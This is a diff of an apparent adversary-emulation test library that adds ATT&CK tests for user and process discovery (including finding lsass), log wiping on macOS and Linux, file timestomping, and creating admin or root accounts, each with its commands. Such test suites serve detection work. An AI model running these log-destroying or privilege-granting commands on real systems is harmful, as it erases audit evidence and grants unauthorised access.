+$TokenSet = @{
+  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+  N = [Char[]]'0123456789'
+}
+$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+$Number = Get-Random -Count 5 -InputObject $TokenSet.N
+$StringSet = $Upper + $Number
+$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+$file = "rad" + $rad + ".tmp"
+
+whoami.exe /all >> #{output_path}\$file
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path #{output_path}\rad*.tmp -Force
+```
+
+
+
+
+
 <br/>

atomics/T1033/T1033.yaml

@@ -74,3 +74,34 @@ atomic_tests:
     cleanup_command: |
       Remove-Item -Path .\CurrentUserObject.txt -Force
     name: powershell
+- name: System Discovery - SocGholish whoami
+  auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+  description: |
+    SocGholish performs whoami discovery commands and outputs the results to a tmp file. 
+    The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
+
+    Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_path:
+      description: Location of output file
+      type: string
+      default: $env:temp
+  executor:
+    command: |
+      $TokenSet = @{
+        U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+        N = [Char[]]'0123456789'
+      }
+      $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+      $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+      $StringSet = $Upper + $Number
+      $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+      $file = "rad" + $rad + ".tmp"
+
+      whoami.exe /all >> #{output_path}\$file
+    
+    cleanup_command: |
+      Remove-Item -Path #{output_path}\rad*.tmp -Force
+    name: powershell

atomics/T1057/T1057.md

@@ -16,6 +16,8 @@ In Windows environments, adversaries could obtain details on running processes u
 
 - [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process)
 
+- [Atomic Test #6 - Discover Specific Process - tasklist](#atomic-test-6---discover-specific-process---tasklist)
+
 
 <br/>
 
@@ -176,4 +178,38 @@ wmic process get /format:list
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Discover Specific Process - tasklist
+Adversaries may use command line tools to discover specific processes in preparation of further attacks. 
+Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_to_enumerate | Process name string to search for. | string | lsass|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+tasklist | findstr #{process_to_enumerate}
+```
+
+
+
+
+
+
 <br/>

atomics/T1057/T1057.yaml

@@ -70,3 +70,19 @@ atomic_tests:
     command: |
       wmic process get /format:list
     name: command_prompt
+- name: Discover Specific Process - tasklist
+  auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+  description: |
+    Adversaries may use command line tools to discover specific processes in preparation of further attacks. 
+    Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
+  supported_platforms:
+  - windows
+  input_arguments:
+    process_to_enumerate:
+      description: Process name string to search for.
+      type: string
+      default: 'lsass'
+  executor:
+    command: |
+      tasklist | findstr #{process_to_enumerate}
+    name: command_prompt

atomics/T1070.002/T1070.002.md

@@ -15,9 +15,33 @@
 
 - [Atomic Test #1 - rm -rf](#atomic-test-1---rm--rf)
 
-- [Atomic Test #2 - Overwrite Linux Mail Spool](#atomic-test-2---overwrite-linux-mail-spool)
+- [Atomic Test #2 - Delete log files using built-in log utility](#atomic-test-2---delete-log-files-using-built-in-log-utility)
 
-- [Atomic Test #3 - Overwrite Linux Log](#atomic-test-3---overwrite-linux-log)
+- [Atomic Test #3 - Truncate system log files via truncate utility](#atomic-test-3---truncate-system-log-files-via-truncate-utility)
+
+- [Atomic Test #4 - Delete log files via cat utility by appending /dev/null or /dev/zero](#atomic-test-4---delete-log-files-via-cat-utility-by-appending-devnull-or-devzero)
+
+- [Atomic Test #5 - System log file deletion via find utility](#atomic-test-5---system-log-file-deletion-via-find-utility)
+
+- [Atomic Test #6 - Overwrite macOS system log via echo utility](#atomic-test-6---overwrite-macos-system-log-via-echo-utility)
+
+- [Atomic Test #7 - Real-time system log clearance/deletion](#atomic-test-7---real-time-system-log-clearancedeletion)
+
+- [Atomic Test #8 - Delete system log files via unlink utility](#atomic-test-8---delete-system-log-files-via-unlink-utility)
+
+- [Atomic Test #9 - Delete system log files using shred utility](#atomic-test-9---delete-system-log-files-using-shred-utility)
+
+- [Atomic Test #10 - Delete system log files using srm utility](#atomic-test-10---delete-system-log-files-using-srm-utility)
+
+- [Atomic Test #11 - Delete system log files using OSAScript](#atomic-test-11---delete-system-log-files-using-osascript)
+
+- [Atomic Test #12 - Delete system log files using Applescript](#atomic-test-12---delete-system-log-files-using-applescript)
+
+- [Atomic Test #13 - Delete system journal logs via rm and journalctl utilities](#atomic-test-13---delete-system-journal-logs-via-rm-and-journalctl-utilities)
+
+- [Atomic Test #14 - Overwrite Linux Mail Spool](#atomic-test-14---overwrite-linux-mail-spool)
+
+- [Atomic Test #15 - Overwrite Linux Log](#atomic-test-15---overwrite-linux-log)
 
 
 <br/>
@@ -51,7 +75,355 @@ sudo rm -rf /private/var/audit/*
 <br/>
 <br/>
 
-## Atomic Test #2 - Overwrite Linux Mail Spool
+## Atomic Test #2 - Delete log files using built-in log utility
+This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 653d39cd-bae7-499a-898c-9fb96b8b5cd1
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo log erase --all
+sudo log erase --ttl #Deletes only time-to-live log content
+sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Truncate system log files via truncate utility
+This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 6290f8a8-8ee9-4661-b9cf-390031bf6973
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo truncate -s 0 /var/log/system.log #size parameter shorthand
+sudo truncate --size=0 /var/log/system.log #size parameter
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Delete log files via cat utility by appending /dev/null or /dev/zero
+The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** c23bdb88-928d-493e-b46d-df2906a50941
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
+sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - System log file deletion via find utility
+This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
+sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Overwrite macOS system log via echo utility
+This test overwrites the contents of system log file with an empty string using echo utility
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 0208ea60-98f1-4e8c-8052-930dce8f742c
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo echo '' > /var/log/system.log
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Real-time system log clearance/deletion
+This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo log -f /var/log/system.log | : > /var/log/system.log
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Delete system log files via unlink utility
+This test deletes the system log file using unlink utility
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 03013b4b-01db-437d-909b-1fdaa5010ee8
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo unlink /var/log/system.log
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Delete system log files using shred utility
+This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo shred -u -z -n 3 /var/log/system.log
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Delete system log files using srm utility
+This test securely deletes the system log files individually and recursively using the srm utility.
+Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
+Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** b0768a5e-0f32-4e75-ae5b-d036edcf96b6
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo srm /var/log/system.log #system log file deletion
+sudo srm -r /var/log/ #recursive deletion of log files
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Delete system log files using OSAScript
+This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 810a465f-cd4f-47bc-b43e-d2de3b033ecc
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Delete system log files using Applescript
+This test deletes the system log file using applescript using osascript via Finder application
+Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
+Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** e62f8694-cbc7-468f-862c-b10cd07e1757
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Delete system journal logs via rm and journalctl utilities
+The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ca50dd85-81ff-48ca-92e1-61f119cb1dcf
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - Overwrite Linux Mail Spool
 This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
 
 **Supported Platforms:** Linux
@@ -84,7 +456,7 @@ echo 0> /var/spool/mail/#{username}
 <br/>
 <br/>
 
-## Atomic Test #3 - Overwrite Linux Log
+## Atomic Test #15 - Overwrite Linux Log
 This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
 
 **Supported Platforms:** Linux

atomics/T1070.002/T1070.002.yaml

@@ -14,6 +14,150 @@ atomic_tests:
       sudo rm -rf /private/var/audit/*
     name: sh
     elevation_required: true
+- name: Delete log files using built-in log utility 
+  auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
+  description: |
+    This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo log erase --all
+      sudo log erase --ttl #Deletes only time-to-live log content
+      sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
+    name: sh
+    elevation_required: true
+- name: Truncate system log files via truncate utility
+  auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973
+  description: |
+    This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo truncate -s 0 /var/log/system.log #size parameter shorthand
+      sudo truncate --size=0 /var/log/system.log #size parameter 
+    name: sh
+    elevation_required: true
+- name: Delete log files via cat utility by appending /dev/null or /dev/zero
+  auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941
+  description: |
+    The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
+      sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+    name: sh
+    elevation_required: true
+- name: System log file deletion via find utility
+  auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
+  description: |
+    This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
+      sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+      sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+    name: sh
+    elevation_required: true
+- name: Overwrite macOS system log via echo utility
+  auto_generated_guid: 0208ea60-98f1-4e8c-8052-930dce8f742c
+  description: |
+    This test overwrites the contents of system log file with an empty string using echo utility
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo echo '' > /var/log/system.log
+    name: sh
+    elevation_required: true
+- name: Real-time system log clearance/deletion
+  auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
+  description: |
+    This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo log -f /var/log/system.log | : > /var/log/system.log
+    name: sh
+    elevation_required: true
+- name: Delete system log files via unlink utility
+  auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8
+  description: |
+    This test deletes the system log file using unlink utility
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo unlink /var/log/system.log
+    name: sh
+    elevation_required: true
+- name: Delete system log files using shred utility
+  auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
+  description: |
+    This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo shred -u -z -n 3 /var/log/system.log
+    name: sh
+    elevation_required: true
+- name: Delete system log files using srm utility
+  auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6
+  description: |
+    This test securely deletes the system log files individually and recursively using the srm utility.
+    Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
+    Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo srm /var/log/system.log #system log file deletion
+      sudo srm -r /var/log/ #recursive deletion of log files
+    name: sh
+    elevation_required: true
+- name: Delete system log files using OSAScript
+  auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc
+  description: |
+    This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
+    name: sh
+    elevation_required: true
+- name: Delete system log files using Applescript
+  auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757
+  description: |
+    This test deletes the system log file using applescript using osascript via Finder application
+    Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
+    Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
+    name: sh
+    elevation_required: true
+- name: Delete system journal logs via rm and journalctl utilities
+  auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
+  description: |
+    The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+      sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
+    name: sh
+    elevation_required: true 
 - name: Overwrite Linux Mail Spool
   auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
   description: |

atomics/T1070.004/T1070.004.md

@@ -44,7 +44,8 @@ Delete a single file from the temporary directory
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | path | /tmp/victim-files/a|
+| parent_folder | Path of parent folder | path | /tmp/victim-files/|
+| file_to_delete | Path of file to delete | path | /tmp/victim-files/T1070.004-test.txt|
 
 
 #### Attack Commands: Run with `sh`! 
@@ -54,9 +55,25 @@ Delete a single file from the temporary directory
 rm -f #{file_to_delete}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -rf #{parent_folder}
+```
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: The file must exist in order to be deleted
+##### Check Prereq Commands:
+```sh
+test -e #{file_to_delete} && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{parent_folder} && touch #{file_to_delete}
+```
+
+
 
 
 <br/>
@@ -77,7 +94,7 @@ Recursively delete the temporary directory and all files contained within it
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| folder_to_delete | Path of folder to delete | path | /tmp/victim-files|
+| folder_to_delete | Path of folder to delete | path | /tmp/victim-folder|
 
 
 #### Attack Commands: Run with `sh`! 
@@ -90,6 +107,18 @@ rm -rf #{folder_to_delete}
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: The folder must exist in order to be deleted
+##### Check Prereq Commands:
+```sh
+test -e #{folder_to_delete} && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+mkdir -p #{folder_to_delete}
+```
+
+
 
 
 <br/>

atomics/T1070.004/T1070.004.yaml

@@ -9,13 +9,27 @@ atomic_tests:
   - linux
   - macos
   input_arguments:
+    parent_folder:
+      description: Path of parent folder
+      type: path
+      default: /tmp/victim-files/
     file_to_delete:
       description: Path of file to delete
       type: path
-      default: /tmp/victim-files/a
+      default: /tmp/victim-files/T1070.004-test.txt  
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      The file must exist in order to be deleted
+    prereq_command: |
+      test -e #{file_to_delete} && exit 0 || exit 1
+    get_prereq_command: |
+      mkdir -p #{parent_folder} && touch #{file_to_delete}
   executor:
     command: |
       rm -f #{file_to_delete}
+    cleanup_command: |
+      rm -rf #{parent_folder}
     name: sh
 - name: Delete an entire folder - Linux/macOS
   auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
@@ -28,7 +42,15 @@ atomic_tests:
     folder_to_delete:
       description: Path of folder to delete
       type: path
-      default: /tmp/victim-files
+      default: /tmp/victim-folder
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      The folder must exist in order to be deleted
+    prereq_command: |
+      test -e #{folder_to_delete} && exit 0 || exit 1
+    get_prereq_command: |
+      mkdir -p #{folder_to_delete}
   executor:
     command: |
       rm -rf #{folder_to_delete}

atomics/T1070.006/T1070.006.md

@@ -40,7 +40,7 @@ Stomps on the access timestamp of a file
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | path | /opt/filename|
+| target_filename | Path of file that we are going to stomp on last access time | path | /tmp/T1070.006-access.txt|
 
 
 #### Attack Commands: Run with `sh`! 
@@ -50,9 +50,25 @@ Stomps on the access timestamp of a file
 touch -a -t 197001010000.00 #{target_filename}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -f #{target_filename}
+```
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: The file must exist in order to be timestomped
+##### Check Prereq Commands:
+```sh
+test -e #{target_filename} && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+echo 'T1070.006 file access timestomp test' > #{target_filename}
+```
+
+
 
 
 <br/>
@@ -73,7 +89,7 @@ Stomps on the modification timestamp of a file
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | path | /opt/filename|
+| target_filename | Path of file that we are going to stomp on last access time | path | /tmp/T1070.006-modification.txt|
 
 
 #### Attack Commands: Run with `sh`! 
@@ -83,9 +99,25 @@ Stomps on the modification timestamp of a file
 touch -m -t 197001010000.00 #{target_filename}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -f #{target_filename}
+```
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: The file must exist in order to be timestomped
+##### Check Prereq Commands:
+```sh
+test -e #{target_filename} && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+echo 'T1070.006 file modification timestomp test' > #{target_filename}
+```
+
+
 
 
 <br/>
@@ -109,20 +141,24 @@ Sudo or root privileges are required to change date. Use with caution.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | path | /opt/filename|
+| target_filename | Path of file that we are going to stomp on last access time | path | /tmp/T1070.006-creation.txt|
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
 ```sh
-NOW=$(date)
-date -s "1970-01-01 00:00:00"
+NOW=$(date +%m%d%H%M%Y)
+date 010100001971
 touch #{target_filename}
-date -s "$NOW"
+date "$NOW"
 stat #{target_filename}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -f #{target_filename}
+```
 
 
 
@@ -148,7 +184,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_file_path | Path of file to modify timestamps of | path | /opt/filename|
+| target_file_path | Path of file to modify timestamps of | path | /tmp/T1070.006-reference.txt|
 | reference_file_path | Path of reference file to read timestamps from | path | /bin/sh|
 
 
@@ -159,9 +195,25 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 touch -acmr #{reference_file_path} #{target_file_path}
 ```
 
+#### Cleanup Commands:
+```sh
+rm -f #{target_file_path}
+```
 
 
 
+#### Dependencies:  Run with `sh`!
+##### Description: The file must exist in order to be timestomped
+##### Check Prereq Commands:
+```sh
+test -e #{target_file_path} && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+echo 'T1070.006 reference file timestomp test' > #{target_file_path}
+```
+
+
 
 
 <br/>

atomics/T1070.006/T1070.006.yaml

@@ -12,10 +12,19 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: path
-      default: /opt/filename
+      default: /tmp/T1070.006-access.txt
+  dependencies:
+  - description: |
+      The file must exist in order to be timestomped
+    prereq_command: |
+      test -e #{target_filename} && exit 0 || exit 1
+    get_prereq_command: |
+      echo 'T1070.006 file access timestomp test' > #{target_filename}
   executor:
     command: |
       touch -a -t 197001010000.00 #{target_filename}
+    cleanup_command: |
+      rm -f #{target_filename}
     name: sh
 - name: Set a file's modification timestamp
   auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
@@ -28,10 +37,19 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: path
-      default: /opt/filename
+      default: /tmp/T1070.006-modification.txt
+  dependencies:
+  - description: |
+      The file must exist in order to be timestomped
+    prereq_command: |
+      test -e #{target_filename} && exit 0 || exit 1
+    get_prereq_command: |
+      echo 'T1070.006 file modification timestomp test' > #{target_filename}
   executor:
     command: |
       touch -m -t 197001010000.00 #{target_filename}
+    cleanup_command: |
+      rm -f #{target_filename}
     name: sh
 - name: Set a file's creation timestamp
   auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -47,14 +65,17 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: path
-      default: /opt/filename
+      default: /tmp/T1070.006-creation.txt
   executor:
+    elevation_required: true
     command: |
-      NOW=$(date)
-      date -s "1970-01-01 00:00:00"
+      NOW=$(date +%m%d%H%M%Y)
+      date 010100001971
       touch #{target_filename}
-      date -s "$NOW"
+      date "$NOW"
       stat #{target_filename}
+    cleanup_command: |
+      rm -f #{target_filename}
     name: sh
 - name: Modify file timestamps using reference file
   auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
@@ -69,14 +90,23 @@ atomic_tests:
     target_file_path:
       description: Path of file to modify timestamps of
       type: path
-      default: /opt/filename
+      default: /tmp/T1070.006-reference.txt
     reference_file_path:
       description: Path of reference file to read timestamps from
       type: path
       default: /bin/sh
+  dependencies:
+  - description: |
+      The file must exist in order to be timestomped
+    prereq_command: |
+      test -e #{target_file_path} && exit 0 || exit 1
+    get_prereq_command: |
+      echo 'T1070.006 reference file timestomp test' > #{target_file_path}
   executor:
     command: |
       touch -acmr #{reference_file_path} #{target_file_path}
+    cleanup_command: |
+      rm -f #{target_file_path}
     name: sh
 - name: Windows - Modify file creation timestamp with PowerShell
   auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c

atomics/T1078.003/T1078.003.md

@@ -10,9 +10,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #2 - Create local account with admin privileges - MacOS](#atomic-test-2---create-local-account-with-admin-privileges---macos)
 
-- [Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-3---winpwn---loot-local-credentials---powerhell-kittie)
+- [Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS](#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos)
 
-- [Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-4---winpwn---loot-local-credentials---safetykatz)
+- [Atomic Test #4 - Enable root account using dsenableroot utility - MacOS](#atomic-test-4---enable-root-account-using-dsenableroot-utility---macos)
+
+- [Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS](#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos)
+
+- [Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-6---winpwn---loot-local-credentials---powerhell-kittie)
+
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-7---winpwn---loot-local-credentials---safetykatz)
 
 
 <br/>
@@ -96,7 +102,105 @@ sudo dscl . -delete /Users/AtomicUser
 <br/>
 <br/>
 
-## Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie
+## Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
+After execution the new account will be active and added to the Administrators group
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 191db57d-091a-47d5-99f3-97fde53de505
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
+```
+
+#### Cleanup Commands:
+```bash
+sysadminctl interactive -deleteUser art-tester
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
+After execution the current/new user will have root access
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 20b40ea9-0e17-4155-b8e6-244911a678ac
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+dsenableroot #current user
+dsenableroot -u art-tester -p art-tester -r art-root #new user
+```
+
+#### Cleanup Commands:
+```bash
+dsenableroot -d #current user
+dsenableroot -d -u art-tester -p art-tester #new user
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
+After execution the current/new user will be added to the Admin group
+
+**Supported Platforms:** macOS
+
+
